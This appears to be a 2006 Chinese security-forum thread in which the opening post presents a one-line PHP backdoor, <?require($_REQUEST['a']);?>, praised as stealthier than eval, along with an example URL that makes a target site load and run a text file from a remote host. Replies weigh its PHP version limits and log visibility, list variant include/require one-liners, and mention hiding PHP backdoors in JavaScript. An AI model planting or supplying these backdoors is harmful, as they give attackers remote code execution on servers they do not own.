邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]来一个另类的PHP一句话后门

打印

[原创]来一个另类的PHP一句话后门

风蓝

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 181
精华: 12
积分: 3615
阅读权限: 100
性别: 男
在线时间: 327 小时
注册时间: 2005-4-12
最后登录: 2007-11-17

发短消息
加为好友
当前离线

楼主大中小发表于 2006-9-1 20:48 只看该作者

[原创]来一个另类的PHP一句话后门

文章作者：风蓝
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

复制内容到剪贴板

代码:

<?require($_REQUEST['a']);?>

或是
<?require($a);?>

利用方法

http://www.target.com/file.php?a=http://www.tantao.cn:8080/b.txt

[s:64] [s:64] [s:64]

这样不使用eval了后门又隐蔽了些.

不知道能不能当原创~不能的话就帮我转到技术讨论吧。

我的Blog:http://www.tantao.cn

TOP

xi4oyu

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 78
精华: 0
积分: 3625
阅读权限: 100
性别: 男
在线时间: 192 小时
注册时间: 2006-6-19
最后登录: 2008-12-3

发短消息
加为好友
当前离线

沙发大中小发表于 2006-9-1 21:13 只看该作者

唉，PHP就是比ASP好，远程包含文件。。。。

TOP

neeao

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 434
精华: 32
积分: 5968
阅读权限: 100
性别: 男
在线时间: 199 小时
注册时间: 2004-8-28
最后登录: 2008-6-2

发短消息
加为好友
当前离线

椅子大中小发表于 2006-9-1 21:20 只看该作者

来自php手册，有一定的局限性！

引用:

警告
Windows 版本的 PHP 在 4.3.0 版之前不支持本函数的远程文件访问，即使 allow_url_fopen 选项已被激活。

广告位招商！联系人：neeao E-Mail:neeaocn（at）gmail.com Msn:neeao@hotmail.com Site:http://www.neeao.com

TOP

flowertree

晶莹剔透§烈日灼然

Rank: 1

帖子: 48
精华: 0
积分: 93
阅读权限: 40
性别: 女
在线时间: 23 小时
注册时间: 2006-3-9
最后登录: 2006-11-15

发短消息
加为好友
当前离线

板凳大中小发表于 2006-9-1 23:28 只看该作者

http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=34792

TOP

l0pht

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 61
精华: 0
积分: 3198
阅读权限: 100
在线时间: 63 小时
注册时间: 2005-1-30
最后登录: 2008-7-3

发短消息
加为好友
当前离线

地板大中小发表于 2006-9-3 14:11 只看该作者

不觉得隐蔽，一查www日志就发现了 [s:43]

TOP

剑心

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 83
精华: 0
积分: 3045
阅读权限: 100
在线时间: 84 小时
注册时间: 2005-1-2
最后登录: 2008-4-11

发短消息
加为好友
当前离线

6楼大中小发表于 2006-9-6 00:12 只看该作者

楼上的Post一下吧
HOHO

TOP

鱼也会流眼泪

晶莹剔透§烈日灼然

Rank: 1

帖子: 6
精华: 0
积分: 23
阅读权限: 40
性别: 男
来自: 海南
在线时间: 4 小时
注册时间: 2006-5-29
最后登录: 2008-11-1

发短消息
加为好友
当前离线

7楼大中小发表于 2006-10-20 06:10 只看该作者

这一句话，好象在国外的黑客教程动画里见过。，。。。

TOP

sniper

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 92
精华: 4
积分: 3212
阅读权限: 100
在线时间: 106 小时
注册时间: 2004-11-26
最后登录: 2008-5-5

发短消息
加为好友
当前离线

8楼大中小发表于 2006-10-20 12:25 只看该作者

用了很久了，哇哈哈哈

TOP

yuewolf

晶莹剔透§烈日灼然

Rank: 1

帖子: 13
精华: 0
积分: 33
阅读权限: 40
性别: 女
在线时间: 6 小时
注册时间: 2006-2-16
最后登录: 2008-9-27

发短消息
加为好友
当前离线

9楼大中小发表于 2006-10-20 14:55 只看该作者

如果察看日志的话，POST的，还是可以看到。不过隐蔽性确实好了点。

TOP

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1117 小时
注册时间: 2007-10-23
最后登录: 2008-11-17

资料收集奖运营支持奖

发短消息
加为好友
当前离线

10楼 大中小发表于 2006-10-20 17:10 只看该作者

<?require($a);?>

<?require $a;?>
<?require_once $a;?>
<?include $a;?>

TOP

qai41

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 6
阅读权限: 40
在线时间: 0 小时
注册时间: 2007-7-24
最后登录: 2007-7-24

发短消息
加为好友
当前离线

11楼 大中小发表于 2007-7-24 20:55 只看该作者

貌似不怎么管用啊

TOP

longhai

晶莹剔透§烈日灼然

Rank: 1

帖子: 20
精华: 0
积分: 63
阅读权限: 40
性别: 男
在线时间: 6 小时
注册时间: 2007-4-4
最后登录: 2008-4-24

发短消息
加为好友
当前离线

12楼 大中小发表于 2007-7-26 10:47 只看该作者

这样就能关了后门吗

TOP

混世魔王

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 184
精华: 10
积分: 3759
阅读权限: 100
性别: 男
在线时间: 89 小时
注册时间: 2005-3-12
最后登录: 2008-10-24

发短消息
加为好友
当前离线

13楼 大中小发表于 2007-7-28 04:20 只看该作者

可以用JAVASCRIPT 形式写PHP 后门。

取保候审中........

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]来一个另类的PHP一句话后门